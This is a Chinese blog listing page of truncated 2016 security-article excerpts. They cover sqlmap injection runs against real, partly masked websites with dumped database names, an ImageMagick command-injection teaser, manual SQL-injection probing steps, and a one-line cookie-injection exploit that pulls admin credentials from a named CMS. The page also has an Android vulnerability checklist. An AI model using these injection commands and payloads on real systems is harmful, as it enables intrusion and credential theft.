220.163.13*.** root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dbs --tamper=space2comment --level 3 web server operating syste ...
分类:
数据库 时间:
2016-06-02 13:03:00
阅读次数:
218
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 随意制作一个图片,将其内容编辑代码如下: push graphic-con ...
分类:
其他好文 时间:
2016-06-02 12:58:46
阅读次数:
196
1、加入单引号’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2、数字型判断是否有注入;语句:and1=1;and1=2(经典)、‘and‘1‘=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and的意思是“和”如果没有过滤我们的语句,and1=1就会被代入SQL查询语句..
分类:
其他好文 时间:
2016-05-30 15:54:27
阅读次数:
1252
http://blog.csdn.net/leehong2005/article/details/11808557/ webview调用以下文件,就可以打印sdcard 文件名 ...
分类:
移动开发 时间:
2016-05-19 14:58:11
阅读次数:
213
Android常见漏洞
漏洞名称: Log敏感信息泄露
漏洞描述: 程序运行期间打印了用户的敏感信息,造成泄露
修改建议: 建议禁止隐私信息的log
漏洞名称: web https校验错误忽略漏洞
漏洞描述: 漏洞可导致中间人攻击
修改建议: 建议不要忽略ssl认证错误
漏洞名称: sql注入漏洞
漏洞描述: 漏洞可能导致用户数据...
分类:
移动开发 时间:
2016-05-12 23:58:09
阅读次数:
496
摘要:随着网络安全技术的发展,SQL注入作为一种很流行的攻击方式被越来越多的人所知晓。很多网站也都对SQL注入做了防护,许多网站管理员的做法就是添加一个防注入程序。这时我们用常规的手段去探测网站的SQL注入漏洞时会被防注入程序阻挡,遇到这种情况我们该怎么办?难道就没有办法了吗?答案是否定的。 随着网 ...
分类:
Web程序 时间:
2016-04-26 07:05:39
阅读次数:
318
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs available databases [8]: [*] dntg [*] dntg2 [*] dnweb [*] information_schema [*] my ...
分类:
数据库 时间:
2016-04-23 14:44:11
阅读次数:
302
一:网站程序存在的漏洞1. 注入漏洞2. 上传文件格式验证不完善3. 参数可写入文件——构造一句话4. mdb数据库改用ASP\ASA等名字作为数据库扩展名(添加防下载代码)5. 后台显示数据库路径6. 数据库可备份修改扩展7. 文件管理部分传递参数过滤问题及外部提交8. XSS漏洞骗取cookie ...
分类:
Web程序 时间:
2016-04-18 01:09:10
阅读次数:
202
启航企业建站系统 cookie注入漏洞通杀所有版本直接上exploit:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admi ...
分类:
其他好文 时间:
2016-04-18 01:06:20
阅读次数:
2280